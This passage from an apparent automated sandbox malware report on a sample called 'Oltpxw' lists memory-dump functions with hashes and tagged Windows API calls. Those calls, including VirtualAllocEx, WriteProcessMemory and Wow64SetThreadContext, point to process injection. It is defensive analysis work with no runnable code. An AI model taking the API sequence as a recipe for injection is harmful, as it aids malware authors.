                                                • Instruction Fuzzy Hash: 9DA1D478E00209CFDB94DFA9D444AEDBBB6FF88301F158029E91267394CB34598ACF91
                                                Function 06580D51 Relevance: 2.5, Strings: 2, Instructions: 41COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348904201.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6580000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: '$<
                                                • API String ID: 0-482612310
                                                • Opcode ID: d4879e3cd312acb6164bc7a8ebf4b14b9f42e432d44c960fb85fe2b8c5740f71
                                                • Instruction ID: 1a40870229ffb26cbf9889f6eba5fcb133705e0c84f821b53c6abb88a6a9fc7a
                                                • Opcode Fuzzy Hash: d4879e3cd312acb6164bc7a8ebf4b14b9f42e432d44c960fb85fe2b8c5740f71
                                                • Instruction Fuzzy Hash: 78119C78D04229CFDB65DF64C845BE8BBB2BF49304F0081E9D909A7255DB315E95CF80
                                                Function 065807B9 Relevance: 2.5, Strings: 2, Instructions: 34COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348904201.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6580000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ($*
                                                • API String ID: 0-3813467706
                                                • Opcode ID: 06a9154d0af3369eb6b518010cfbdb2c1296a7895f206ef1c0973608cc42b286
                                                • Instruction ID: cb4af7990e8916c0ecde2c60a9b194942e8bd2049556e1d1f7befab499f46437
                                                • Opcode Fuzzy Hash: 06a9154d0af3369eb6b518010cfbdb2c1296a7895f206ef1c0973608cc42b286
                                                • Instruction Fuzzy Hash: 8501163090171ACFDB609F14D848BA9B3B1FB41324F109795D46973991DB756AC9CF80
                                                Function 06817C4C Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2349412832.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6810000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: m$w
                                                • API String ID: 0-2160559192
                                                • Opcode ID: a222cf9ee2f60ce9c4a32f5388ea7a1be4dce33dd6778a812dfc099579c8461c
                                                • Instruction ID: 0dfbf364dfcc94ce33b93a5dd39b3a48b8ab4d8d91469670910afc5a79ecbc19
                                                • Opcode Fuzzy Hash: a222cf9ee2f60ce9c4a32f5388ea7a1be4dce33dd6778a812dfc099579c8461c
                                                • Instruction Fuzzy Hash: 0B01D37890421ACFDB60DF24D888ADCB7B5BB08304F1040D5E55CA7360DB34AE84DF50
                                                Function 0682EC28 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2349412832.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6810000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,iq
                                                • API String ID: 0-1887606315
                                                • Opcode ID: e63a2e1e25fd25f29594b2874a7e62fe2f2f16c23cc5f6558ca1ad783502a1dc
                                                • Instruction ID: 78fe2c05ab5943e38ca0ce5cda0cfc9df601bbf5d52cbb446ea48f9f6cc2ffcb
                                                • Opcode Fuzzy Hash: e63a2e1e25fd25f29594b2874a7e62fe2f2f16c23cc5f6558ca1ad783502a1dc
                                                • Instruction Fuzzy Hash: E9520975A002288FDB64DF69C945BADBBF2BF88710F1540D9E609EB351DA309E81CF61
                                                Function 065655F5 Relevance: 1.7, APIs: 1, Instructions: 207processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 065657DA
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 31487a633741c08f135271c7deebd0000c9a28034927ed1f27d8d6a92e266272
                                                • Instruction ID: 45abae031605f0f9013975756b8afc20983a5069f019de34b326a84419b16ddf
                                                • Opcode Fuzzy Hash: 31487a633741c08f135271c7deebd0000c9a28034927ed1f27d8d6a92e266272
                                                • Instruction Fuzzy Hash: 37812871D106199FDB50CFAAC9817AEBBF2BF48310F248529E859A7254EB749881CF81
                                                Function 06565600 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 065657DA
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: dbb64231a91d6784dc1897aa676cc9d0cc6b439d50bffa44f46194354eccba09
                                                • Instruction ID: 8cb0c07e6ac4d081efd11daeaecb60c2e185f03eb9cac95415809b972993d63e
                                                • Opcode Fuzzy Hash: dbb64231a91d6784dc1897aa676cc9d0cc6b439d50bffa44f46194354eccba09
                                                • Instruction Fuzzy Hash: F88128B1D106199FDB50CFAAC9817ADBBF2FF48310F248529E859E7254EB749881CF81
                                                Function 06565E18 Relevance: 1.6, APIs: 1, Instructions: 76injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06565EB0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 10562901aea891a5f2f8dc9915cd2164ddc0046a34c4184efb66f85fcb5e78ad
                                                • Instruction ID: bd5ccc24af5b0e53fb599dd0e92d7bff2bb534d819b815eab16b176fe96e767d
                                                • Opcode Fuzzy Hash: 10562901aea891a5f2f8dc9915cd2164ddc0046a34c4184efb66f85fcb5e78ad
                                                • Instruction Fuzzy Hash: CE2119759003599FCF10CFAAC985BDEBBF5FF48310F108429E519A7240D7749944DBA5
                                                Function 06565E20 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06565EB0
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 302dbd1af7e3b3b217a895391cd2c1666c91e006187d93fe5cb23cf7a92e52be
                                                • Instruction ID: 559bfc6818f027957ab284e6c55df3a3d8a723f7cd2acfd18db32fffc368a5d1
                                                • Opcode Fuzzy Hash: 302dbd1af7e3b3b217a895391cd2c1666c91e006187d93fe5cb23cf7a92e52be
                                                • Instruction Fuzzy Hash: 8C2115759003199FCB10CFAAC985BEEBBF5FF48310F10842AE918A7240D7789944DBA4
                                                Function 065658F8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0656597E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 656d46722f3f6c0e814d7efb20751c44b16ba3075a21accae8d69140cbd1e4e7
                                                • Instruction ID: 3c3b7792126c6253c21079516e0f8426e61bc7046a8e77c052c2713c99709552
                                                • Opcode Fuzzy Hash: 656d46722f3f6c0e814d7efb20751c44b16ba3075a21accae8d69140cbd1e4e7
                                                • Instruction Fuzzy Hash: B32148B1D002098FDB10CFAAC884BEEBBF5FF48324F148429E459A7241DB789945CFA4
                                                Function 0281D0A8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0281D076,?,?,?,?,?), ref: 0281D137
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2320843093.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2810000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 8e0d23102ae262e36fbe59af474bd57c93cedb2644d285684f0760ed5c1f7ca7
                                                • Instruction ID: 0a66b010c3cfb0d96f7d0585e466943c0bce6ad95dd1f34e627e45b805bef3fa
                                                • Opcode Fuzzy Hash: 8e0d23102ae262e36fbe59af474bd57c93cedb2644d285684f0760ed5c1f7ca7
                                                • Instruction Fuzzy Hash: BE21F4B5901208DFDB10CFAAD984ADEFBF5FB48320F14801AE918A3350C378A950CFA0
                                                Function 0281CC9C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0281D076,?,?,?,?,?), ref: 0281D137
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2320843093.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2810000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 7299572c7f89e39e5b5fd23c439ea253e17c651be3bfc2d7740215bf68945f75
                                                • Instruction ID: 27bed5e817a2203b5c2afc94bfec2761b6a546db1a918ffb9b89d09dbeebb372
                                                • Opcode Fuzzy Hash: 7299572c7f89e39e5b5fd23c439ea253e17c651be3bfc2d7740215bf68945f75
                                                • Instruction Fuzzy Hash: 892105B9900218DFDB10CF9AD984ADEFBF9EB48310F14801AE918A3350C374A940CFA5
                                                Function 06566209 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06566284
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: d23f4aaa26b95b0abb5a148b7008d265299792d880b8dde80680b264417e64b9
                                                • Instruction ID: cc8fd1d330d403020cd05695f19c95f67f3d3c123f7d452b09ef6df95e244846
                                                • Opcode Fuzzy Hash: d23f4aaa26b95b0abb5a148b7008d265299792d880b8dde80680b264417e64b9
                                                • Instruction Fuzzy Hash: FA212571C002099FDB10CFAAC980BEEBBF5FF48320F148429E519A7240CB79A944CFA1
                                                Function 06565900 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0656597E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 6fe51e59ae8819debce2823c91348a5964ebc79ac73698d75d27501ed26702b4
                                                • Instruction ID: 930f263f3680e0ece299bab649675812241c5243cbbf2a4822e86edab75fc62d
                                                • Opcode Fuzzy Hash: 6fe51e59ae8819debce2823c91348a5964ebc79ac73698d75d27501ed26702b4
                                                • Instruction Fuzzy Hash: 5A2138B1D003098FDB10CFAAC8857AEBBF4FF48324F14842AD459A7240DB789945CFA4
                                                Function 06565D18 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06565D8E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: d1123136f941a53a393ed02329805f5743541efdb41c495d0112228d9682234f
                                                • Instruction ID: 5d78aa400f2045008dc9776cd151e827c709a248f3b00c2ef27e11e5ed84f7d1
                                                • Opcode Fuzzy Hash: d1123136f941a53a393ed02329805f5743541efdb41c495d0112228d9682234f
                                                • Instruction Fuzzy Hash: 261147758002499FCB20CFAAD844AEFBFF9FF88320F148419E519A7250CB75A940CFA1
                                                Function 06566210 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06566284
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 057c4d55f8431ba8f35e1f52a3cae39f07c035d55ed485d3841df3f20223500e
                                                • Instruction ID: daf874a2a67e38fb4200422c62787c40a41e9be300843ef5182d197534be4991
                                                • Opcode Fuzzy Hash: 057c4d55f8431ba8f35e1f52a3cae39f07c035d55ed485d3841df3f20223500e
                                                • Instruction Fuzzy Hash: D5211871C002098FDB10DFAAC984BAEFBF5FF48320F148429D419A7240DB789545DFA1
                                                Function 065BDA68 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 065BDADC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348952426.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_65b0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 8700483fbc307ec4207c15238e98c3c5636098f93641bfa539983dfb10e96c8c
                                                • Instruction ID: 9b12984cc304410d6201ecd603497921bfac2002439a4e5818cb4db8c6678618
                                                • Opcode Fuzzy Hash: 8700483fbc307ec4207c15238e98c3c5636098f93641bfa539983dfb10e96c8c
                                                • Instruction Fuzzy Hash: 151117B1D042099FDB10DFAAC884AEEFBF5FF48320F14842AD419A7250DB75A945CFA1
                                                Function 028192C8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0281933D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2320843093.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2810000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 4994d08388a087cadcd1734cc4f5bba0449bb6e4d9e0a8fa7911183f6945f33f
                                                • Instruction ID: 7cb816954118f0a7aadfbd89f0b397b4201c0a0796619782229005f497380a14
                                                • Opcode Fuzzy Hash: 4994d08388a087cadcd1734cc4f5bba0449bb6e4d9e0a8fa7911183f6945f33f
                                                • Instruction Fuzzy Hash: CF218C75809388CFDB11CF99D5143EEBFF4EB09314F14409ED59AA7282C779AA04CBA2
                                                Function 06565D20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06565D8E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348813518.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6560000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: af4fe078fd14957f0349471d3ac5bce9e1af6c21e5831ba30e31e54d5e04fce2
                                                • Instruction ID: 7b80964b57e370e09209581d61be5603c9ac69d3fbe5a3376ea2f05203058887
                                                • Opcode Fuzzy Hash: af4fe078fd14957f0349471d3ac5bce9e1af6c21e5831ba30e31e54d5e04fce2
                                                • Instruction Fuzzy Hash: CC1137769002499FCB10DFAAC844AEFBFF5FF88320F148419E519A7250CB75A940DFA0
                                                Function 02818A84 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0281A7E4), ref: 0281AA1E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2320843093.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2810000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 39250b8a338c5c921802664467229454afbf9a29a0a5c813c060eca5db529ce0
                                                • Instruction ID: 122cc49d9ceabf81af3495ff85e8e5ca788fb38fb11432d2076f5db1f720e838
                                                • Opcode Fuzzy Hash: 39250b8a338c5c921802664467229454afbf9a29a0a5c813c060eca5db529ce0
                                                • Instruction Fuzzy Hash: 921102BAC012498FDB14CF9AC544ADEFBF8EB88224F11845AD919B7240C375A545CFA1
                                                Function 028192D8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0281933D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2320843093.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2810000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: e98da028ba51147b8542f3ae8586c735f154a7406407bacc83913b6748927595
                                                • Instruction ID: f3bf5c7446d00146f16facf191413d426202c299acedb60b39ee1b72da18631f
                                                • Opcode Fuzzy Hash: e98da028ba51147b8542f3ae8586c735f154a7406407bacc83913b6748927595
                                                • Instruction Fuzzy Hash: E8118B75804389CEDB11CF99D5147EEBBF8EB09314F14409ED58AA3382C379AA04CBA1
                                                Function 063DEE7A Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq
                                                • API String ID: 0-1552367303
                                                • Opcode ID: 6636c41b67cb0e82aa4e7cec67def27d638c71bf05f059bd38a0f038c6df2b2c
                                                • Instruction ID: f53ec60151736187cc626c916f83bcd8e823b0eae65bae6c7fdffd97306e2143
                                                • Opcode Fuzzy Hash: 6636c41b67cb0e82aa4e7cec67def27d638c71bf05f059bd38a0f038c6df2b2c
                                                • Instruction Fuzzy Hash: 93B1DB35A10618DFCB44DFA4D898D9DBBB2FF89310F158559E506AB361DB30EC46CB90
                                                Function 063D2289 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJjq
                                                • API String ID: 0-2687929720
                                                • Opcode ID: b23f1033ff740cc1d86718fd7397ae168b41ffd5967c2b8742302bcd5c403fc4
                                                • Instruction ID: 2bed9e3187bb2fbaf27af67f647ce50540097c9ad73907fa680be8fbbe844277
                                                • Opcode Fuzzy Hash: b23f1033ff740cc1d86718fd7397ae168b41ffd5967c2b8742302bcd5c403fc4
                                                • Instruction Fuzzy Hash: 1A51E374D11209DFDB44DFA5E894AEEBBB2FF89304F10806AE515A73A0DB345A45CF90
                                                Function 063D2298 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TJjq
                                                • API String ID: 0-2687929720
                                                • Opcode ID: 394aca5d34dd6ab7b9f4bbf2124629f81b5307fedb92dce9b42a99aac36f35a4
                                                • Instruction ID: d846398873d169317dc19ed0c85ba84091023723d584729c6a0ff3b7835a12c8
                                                • Opcode Fuzzy Hash: 394aca5d34dd6ab7b9f4bbf2124629f81b5307fedb92dce9b42a99aac36f35a4
                                                • Instruction Fuzzy Hash: 3C51B274D10209DFDB44DFA5E594AAEBBB6FF88304F10806AE519A33A0DB345A45CF90
                                                Function 063DDEF1 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348062397.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_63d0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq
                                                • API String ID: 0-1552367303
                                                • Opcode ID: c43b9537f51789cf69086a45623202ed7fbf905b1fd583fa8ed5493e676d3de1
                                                • Instruction ID: 34f5e658832f4a8ec6ee2e5308037b37f02fe6cfc7cf1031f5fad9ed1ff85627
                                                • Opcode Fuzzy Hash: c43b9537f51789cf69086a45623202ed7fbf905b1fd583fa8ed5493e676d3de1
                                                • Instruction Fuzzy Hash: 86317336700108AFCB559FA5D845D5EBBA7FF8D321B1540A9EA0A9B361DB31DC42CB90
                                                Function 0653AE40 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348728871.0000000006530000.00000040.00000800.00020000.00000000.sdmp, Offset: 06530000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6530000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (iq
                                                • API String ID: 0-3943945277
                                                • Opcode ID: 2b7fbfeac7a4d53d527baf474e09d4e7da26ad05c37b2e10c4ffe72b618322ea
                                                • Instruction ID: 459d4b47df91efadf6057a17ba33c2350492ef214bb462c5d23430bf6f74f623
                                                • Opcode Fuzzy Hash: 2b7fbfeac7a4d53d527baf474e09d4e7da26ad05c37b2e10c4ffe72b618322ea
                                                • Instruction Fuzzy Hash: 732136397042216BDB056E69D840AAABF97FBC9720F14803DF908CB390CF329C11C7A1
                                                Function 06813506 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2349412832.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6810000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: g
                                                • API String ID: 0-30677878
                                                • Opcode ID: e5d54817147d774b2b3d5271a7fbbe9d29808939452323021845febe5b73a036
                                                • Instruction ID: 64c02ddb95e8fa20abba449fdf150f1508cccbe457e623e3a9cefd0d3ee4972d
                                                • Opcode Fuzzy Hash: e5d54817147d774b2b3d5271a7fbbe9d29808939452323021845febe5b73a036
                                                • Instruction Fuzzy Hash: 5F41DE74A00229CFDBA0EF28D884ADEB7F5AB49344F2040E9951DA7295DB349EC5CF40
                                                Function 06350D7C Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2347750257.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6350000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'eq
                                                • API String ID: 0-1552367303
                                                • Opcode ID: fa5217fd1ac64343949ba49ef5e4533e0d3a014f3eebe299edaabbffa32c9c47
                                                • Instruction ID: c392b352e3d41e28e6cdef0ef2fed3f883326e6fc6e1d3132ff06e4cd1d4735e
                                                • Opcode Fuzzy Hash: fa5217fd1ac64343949ba49ef5e4533e0d3a014f3eebe299edaabbffa32c9c47
                                                • Instruction Fuzzy Hash: A6314674D04209CFDB98CFA9C914BEEBBB1EF44301F12846AD916A7290D7395949CFD1
                                                Function 065BEAE0 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 065BEB4B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348952426.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_65b0000_Oltpxw.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 256e4e4c289204476462d8979ee2ded41e306114486f6b88afa37057724883ab
                                                • Instruction ID: f0c1f50947d5874226950eff6ab24a2a0daf3f14346439337c7e8e75f0ecea5e
                                                • Opcode Fuzzy Hash: 256e4e4c289204476462d8979ee2ded41e306114486f6b88afa37057724883ab
                                                • Instruction Fuzzy Hash: 901126759002098FDB10DFAAC845AEEFBF5FF88320F148419D519A7250CA75A540CFA4
                                                Function 065808E4 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348904201.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6580000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: &
                                                • API String ID: 0-1010288
                                                • Opcode ID: e1bd897d014c13d0882ea3e1b55efa14eb94a46412fee73ddea0d3e6c6799ced
                                                • Instruction ID: e5b17d00030a0490cceb35db55c63ee5b453710c1273dd6d2e0b50299633649e
                                                • Opcode Fuzzy Hash: e1bd897d014c13d0882ea3e1b55efa14eb94a46412fee73ddea0d3e6c6799ced
                                                • Instruction Fuzzy Hash: A021ED70A04229CFDBA0DF28D844BE8BBB1BB48304F5041EAD51CAB695DB325E89CF40
                                                Function 06580453 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2348904201.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6580000_Oltpxw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !
                                                • API String ID: 0-2657877971
                                                • Opcode ID: f1934539325eea9b4c00474b5f26e6f3fc5fd892a54f464b318c4ae0f31d8996
